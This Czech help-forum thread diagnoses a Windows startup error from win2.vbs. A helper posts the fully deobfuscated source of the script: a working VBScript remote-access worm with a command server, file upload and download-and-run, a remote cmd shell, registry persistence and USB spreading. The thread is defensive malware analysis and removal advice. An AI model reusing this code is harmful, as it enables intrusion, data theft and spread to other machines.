Microsoft VBscript - Chyba 800A03E9

[inditarod]

Dobrý den, jsem pouhým uživatelem PC a tak nevím, co s tím...
Nainstaloval jsem před dvěma dny WIN 10 a objevuje se mi po startu okno, kde se uvádí:

\appdata\roaming\win2.vbs
řádek: 12
znak: 1
chyba: nedostatek paměti
kód: 800A03E9
zdroj: Microsoft VBScript - chyba komponenty

Díky za radu...

[Uziv00]

ten skript přejmenuj na .txt a vlož sem, popřípadě na leteckou poštu a sem odkaz. Zkusím se podívat, co to vlastně dělá.

[inditarod]

Díky moc...

http://leteckaposta.cz/530366143

[Uziv00]

Ahoj,
dle mého se jedná o pokud o nějaké zavirování, či jiný škodlivý kód.
Počátek kódu je jasně nesmysl - resp. snaha o nějaké utajení:

Kód: Vybrat vše

'PPPPFFyfdvuf)dis)!2,23*!'!dis)!:10:*!'!dis)!99,27*!'!dis)!:4,29*!'!dis)!211,26*!'!dis)!57505*!'!dis)!27,27*!'!dis)!53,2:*!'!dis)!3990:*!'!dis)!451021*!'!dis)!3641033*!'!dis)!96,35*!'!dis)!29:1029*!'!dis)!54305*!'!dis)!2525025*!'!dis)!37,2:*!'!dis)!35606*!'!dis)!43,28*!'!dis)!57,4*!'!dis)!34,34*!'!dis)!3463032*!'!dis)!2749025*!'!dis)!2:71031*!'!dis)!32703*!'!dis)!96,31*!'!dis)!:2,9*!'!dis)!2645024*!'!dis)!54705*!'!dis)!5250:*!'!dis)!89,32*!'!dis)!3331031*!'!dis)!2:73029*!'!dis)!4502*!'!dis)!.2,25*!'!dis)!221022*!'!dis)!3351031*!'!dis)!:3,2:*!'!dis)!2821026*!'!dis)!21550:*!'!dis)!463022*!'!dis)!68,5*!'!dis)!655028*!'!dis)!853025*!'!dis)!43,32*!'!dis)!21703*!'!dis)!56,9*!'!dis)!52,22*!'!dis)!6305*!'!dis)!.7,27*!'!dis)!::,7*!'!dis)!2321022*!'!dis)!91608*!'!dis)!45904*!'!dis)!3342034*!'!dis)!96,34*!'!dis)!32703*!'!dis)!71107*!'!dis)!3211031*!'!dis)!:9,27*!'!dis)!71902:*!'!dis)!66,7*!'!dis)!28,26*!'!dis)!22,34*!'!dis)!27,32*!'!dis)!96,23*!'!dis)!:5,29*!'!dis)!99,35*!'!dis)!88,34*!'!dis)!2663027*!'!dis)!2735025*!'!dis)!88,31*!'!dis)!33,26*!'!dis)!38309*!'!dis)!267023*!'!dis)!.7,27*!'!dis)!384032*!'!dis)!9109*!'!dis)!:8,4*!'!dis)!:3,24*!'!dis)!211,:*!'!dis)!4302*!'!dis)!25:6024*!'!dis)!:1,25*!'!dis)!98,25*!'!dis)!3595034*!'!dis)!65106*!'!dis)!:3,2:*!'!dis)!:91021*!'!dis)!3337032*!'!dis)!2:307*!'!dis)!27:024*!'!dis)!261026*!'!dis)!3871035*!'!dis)!2323023*!'!dis)! //// zkráceno

Dále si skript zjišťuje cestu k adresáři, kde je uložen a poté načítá sám sebe a dekóduje se.
Konečný kód je také jednoduše nečitelný:

Funkce chr() převádí číslo z ascii kódu na písmeno textu. Výsledný text obsahující vlastní program se snaží spustit metodou "Execute". A zde je kámen úrazu, protože Visual Basic Script metodu "Execute" vůbec nezná - to je důvod, proč to hlásí chybu. Skript byl patrně stvořen pro vyšší verzi - tedy přímo pro Visual Basic, nebo to možná umí i VBA - Visual Basic for Application, který umí např. Excel.
Snahy o zamaskování toho, co skript má dělat, mě vedou k závěru, že jde o škodlivý kód. Kromě toho VBSEditor, který používám pro ladění skriptů po nahrání tohoto kódu spadne. Doporučuji návštěvu sekce HijackThis.

Dodatečně přidáno po 52 minutách 50 vteřinách:
Takže rozluštěný kód je zde:

Kód: Vybrat vše

host = "smile-111.publicvm.com"
port = 55554
installdir = "%appdata%"

dim shellobj 
set shellobj = wscript.createobject("wscript.shell")
dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")
dim httpobj
set httpobj = createobject("msxml2.xmlhttp")

installname = wscript.scriptname
startup = shellobj.specialfolders ("Startup") & "\"
installdir = shellobj.expandenvironmentstrings(installdir) & "\"
if not filesystemobj.folderexists(installdir) then  installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
spliter = "<" & "|" & ">"
sleep = 5000 
dim response
dim cmd
dim param
info = ""
usbspreading = ""
startdate = ""
dim oneonce

on error resume next
if InStr(1,wscript.scriptfullname,"Pictures") <> 0 then
dirch = shellobj.expandenvironmentstrings("%temp%") & "\" & "\Images"
if filesystemobj.folderexists(dirch) = 0 then
strPath = Wscript.Arguments(0)
strPath = "explorer.exe /e," & dirch
    filesystemobj.CreateFolder(dirch)
	shellobj.run strPath
	Else
	strPath = Wscript.Arguments(0)
strPath = "explorer.exe /e," & dirch
	shellobj.run strPath
end if
end if



instance
while true

install

response = ""
response = post("is-ready","")
cmd = split (response,spliter)
select case cmd (0)
case "excecute"
      param = cmd (1)
      execute param
case "update"
      param = cmd (1)
      oneonce.close
      set oneonce =  filesystemobj.opentextfile (installdir & installname ,2, false)
      oneonce.write param
      oneonce.close
      shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
      wscript.quit 
case "uninstall"
      uninstall
case "send"
      download cmd (1),cmd (2)
case "site-send"
      sitedownloader cmd (1),cmd (2)
case "recv"
      param = cmd (1)
      upload (param)
case  "enum-driver"
      post "is-enum-driver",enumdriver  
case  "enum-faf"
      param = cmd (1)
      post "is-enum-faf",enumfaf (param)
case  "enum-process"
      post "is-enum-process",enumprocess   
case  "cmd-shell"
      param = cmd (1)
      post "is-cmd-shell",cmdshell (param)  
case  "delete"
      param = cmd (1)
      deletefaf (param) 
case  "exit-process"
      param = cmd (1)
      exitprocess (param) 
case  "sleep"
      param = cmd (1)
      sleep = eval (param)        
end select

wscript.sleep sleep

wend


sub install
on error resume next
dim lnkobj
dim filename
dim foldername
dim fileicon
dim foldericon

upstart
for each drive in filesystemobj.drives

if  drive.isready = true then
if  drive.freespace  > 0 then
if  drive.drivetype  = 1 then
if filesystemobj.folderexists(drive.path & "\Pictures") = 0 then
    filesystemobj.CreateFolder(drive.path & "\Pictures")
    filesystemobj.copyfile wscript.scriptfullname , drive.path & "\Pictures\" & "ReadMe.vbs",true
	filesystemobj.GetFile(drive.path & "\Pictures\" & "ReadMe.vbs").attributes = 2+4
	dim shellobj 
set shellobj = wscript.createobject("wscript.shell")
set lnkobj = shellobj.createshortcut (drive.path & "\Pictures\" & "Images.lnk") 
                    lnkobj.windowstyle = 7
                    lnkobj.targetpath = "cmd.exe"
                    lnkobj.workingdirectory = ""
					lnkobj.iconlocation = "%SystemRoot%\system32\SHELL32.dll,4"
                    lnkobj.arguments = "/c start " & "wscript.exe ReadMe.vbs"
					lnkobj.save()
end if
end if
end if
end if
next
err.clear
end sub

sub uninstall
on error resume next
dim filename
dim foldername

shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
filesystemobj.deletefile startup & installname ,true
filesystemobj.deletefile wscript.scriptfullname ,true

for  each drive in filesystemobj.drives
if  drive.isready = true then
if  drive.freespace  > 0 then
if  drive.drivetype  = 1 then
    for  each file in filesystemobj.getfolder ( drive.path & "\").files
         on error resume next
         if  instr (file.name,".") then
             if  lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
                 file.attributes = 0
                 if  ucase (file.name) <> ucase (installname) then
                     filename = split(file.name,".")
                     filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
                 else
                     filesystemobj.deletefile (drive.path & "\" & file.name)
                 end If
             else
                 filesystemobj.deletefile (file.path) 
             end if
         end if
     next
     for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
         folder.attributes = 0
     next
end if
end if
end if
next
wscript.quit
end sub

function post (cmd ,param)

post = param
httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
httpobj.setrequestheader "user-agent:",information
httpobj.send param
post = httpobj.responsetext
end function

function information
on error resume next
if  inf = "" then
    inf = hwid & spliter 
    inf = inf  & shellobj.expandenvironmentstrings("%computername%") & spliter 
    inf = inf  & shellobj.expandenvironmentstrings("%username%") & spliter

    set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
    set os = root.execquery ("select * from win32_operatingsystem")
    for each osinfo in os
       inf = inf & osinfo.caption & spliter  
       exit for
    next
    inf = inf & "Premry" & spliter
    inf = inf & security & spliter
    inf = inf & usbspreading
    information = inf  
else
    information = inf
end if
end function


sub upstart ()
on error resume Next
shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B "  & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
set lnkobj = shellobj.createshortcut (startup & "Update Explorer.lnk") 
                    lnkobj.windowstyle = 7
                    lnkobj.targetpath = "cmd.exe"
                    lnkobj.workingdirectory = ""
					lnkobj.IconLocation = "explorer.exe"
                    lnkobj.arguments = "/c start " & installdir & installname
					lnkobj.save()
end sub


function hwid
on error resume next

set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set disks = root.execquery ("select * from win32_logicaldisk")
for each disk in disks
    if  disk.volumeserialnumber <> "" then
        hwid = disk.volumeserialnumber
        exit for
    end if
next
end function


function security 
on error resume next

security = ""

set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
for each objitem in colitems
    versionstr = split (objitem.version,".")
next
versionstr = split (colitems.version,".")
osversion = versionstr (0) & "."
for  x = 1 to ubound (versionstr)
	 osversion = osversion &  versionstr (i)
next
osversion = eval (osversion)
if  osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"

set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)

for each objantivirus in colantivirus
    security  = security  & objantivirus.displayname & " ."
next
if security  = "" then security  = "nan-av"
end function


function instance
on error resume next

usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
if usbspreading = "" then
   if lcase ( mid(wscript.scriptfullname,2)) = ":\" &  lcase(installname) then
      usbspreading = "true - " & date
      shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
   else
      usbspreading = "false - " & date
      shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"

   end if
end If



upstart
set scriptfullnameshort =  filesystemobj.getfile (wscript.scriptfullname)
set installfullnameshort =  filesystemobj.getfile (installdir & installname)
if  lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then 
    shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
    wscript.quit 
end If
err.clear
set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
if  err.number > 0 then wscript.quit
end function


sub sitedownloader (fileurl,filename)

strlink = fileurl
strsaveto = installdir & filename
set objhttpdownload = createobject("msxml2.xmlhttp" )
objhttpdownload.open "get", strlink, false
objhttpdownload.send

set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
    objfsodownload.deletefile (strsaveto)
end if
 
if objhttpdownload.status = 200 then
   dim  objstreamdownload
   set  objstreamdownload = createobject("adodb.stream")
   with objstreamdownload
		.type = 1 
		.open
		.write objhttpdownload.responsebody
		.savetofile strsaveto
		.close
   end with
   set objstreamdownload = nothing
end if
if objfsodownload.fileexists(strsaveto) then
   shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if 
end sub

sub download (fileurl,filedir)

if filedir = "" then 
   filedir = installdir
end if

strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
set objhttpdownload = createobject("msxml2.xmlhttp")
objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
objhttpdownload.send ""
     
set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
    objfsodownload.deletefile (strsaveto)
end if
if  objhttpdownload.status = 200 then
    dim  objstreamdownload
	set  objstreamdownload = createobject("adodb.stream")
    with objstreamdownload 
		 .type = 1 
		 .open
		 .write objhttpdownload.responsebody
		 .savetofile strsaveto
		 .close
	end with
    set objstreamdownload  = nothing
end if
if objfsodownload.fileexists(strsaveto) then
   shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if 
end sub


function upload (fileurl)

dim  httpobj,objstreamuploade,buffer
set  objstreamuploade = createobject("adodb.stream")
with objstreamuploade 
     .type = 1 
     .open
	 .loadfromfile fileurl
	 buffer = .read
	 .close
end with
set objstreamdownload = nothing
set httpobj = createobject("msxml2.xmlhttp")
httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
httpobj.send buffer
end function


function enumdriver ()

for  each drive in filesystemobj.drives
if   drive.isready = true then
     enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
end if
next
end Function

function enumfaf (enumdir)

enumfaf = enumdir & spliter
for  each folder in filesystemobj.getfolder (enumdir).subfolders
     enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
next

for  each file in filesystemobj.getfolder (enumdir).files
     enumfaf = enumfaf & file.name & "|" & file.size  & "|" & "f" & "|" & file.attributes & spliter

next
end function


function enumprocess ()

on error resume next

set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_process",,48)

dim objitem
for each objitem in colitems
	enumprocess = enumprocess & objitem.name & "|"
	enumprocess = enumprocess & objitem.processid & "|"
    enumprocess = enumprocess & objitem.executablepath & spliter
next
end function

sub exitprocess (pid)
on error resume next

shellobj.run "taskkill /F /T /PID " & pid,7,true
end sub

sub deletefaf (url)
on error resume next

filesystemobj.deletefile url
filesystemobj.deletefolder url

end sub

function cmdshell (cmd)

dim httpobj,oexec,readallfromany

set oexec = shellobj.exec ("%comspec% /c " & cmd)
if not oexec.stdout.atendofstream then
   readallfromany = oexec.stdout.readall
elseif not oexec.stderr.atendofstream then
   readallfromany = oexec.stderr.readall
else 
   readallfromany = ""
end if

cmdshell = readallfromany
end function

Co se mi zdá podezřelé - zjišťuje si USB disk, testuje, zda je přítomen antivir (a vtipně k tomu využívá služby woken, které to zjišťují), něco stahuje a snaží se to spustit. Taky něco odesílá.

[inditarod]

Jak jsem psal, jsem prachobyčejný uživatel staršího ročníku narození. Co s tím může laik jako já udělat? Díky...

[lukas.sei]

viewtopic.php?p=24386#p24386

Udělej vše až do bodu 5. Lidé v té sekci už ti pak poradí co máš dělat.

[Uziv00]

Ještě dodám, že kód skriptu identifikuje Avast jako VBS.Trojan.Downloader, a to dokonce tak, že jeho webový štít reaguje i na kód uvedený v tomto tématu a zabrání zobrazení stránky.
Tedy je mimo pochyby, že jde o havěť.
Ručně můžeš udělat:
- smazat vlastní skript win2.vbs
- smazat odkaz na win2.vbs v klíčích registru, které zajišťují jeho spouštění po startu:
HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\
HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\
A jak už jsem psal, Vytvoř log v HJT a do stejné sekce (HJT) ho vlož a požádej o kontrolu.
Jaký používáš antivir?

[inditarod]

Mám nod32.
Vymaž, vytvoř log...píšeš pro mě v neznámém jazyku. To nedám. Možná najdu to místo v registru, ale asi nic víc...

Dodatečně přidáno po 3 minutách 17 vteřinách:
Na microsoft stránkách jsem něco našel, ale nic mi to neříká...

https://www.microsoft.com/cs-cz/search/ ... orm=MSHOME

[Uziv00]

lukas.sei ti dal odkaz na návod k vytvoření logu.
Chybu hledat nemusíš, ten skript se správně vůbec spustit nemá, je to havěť.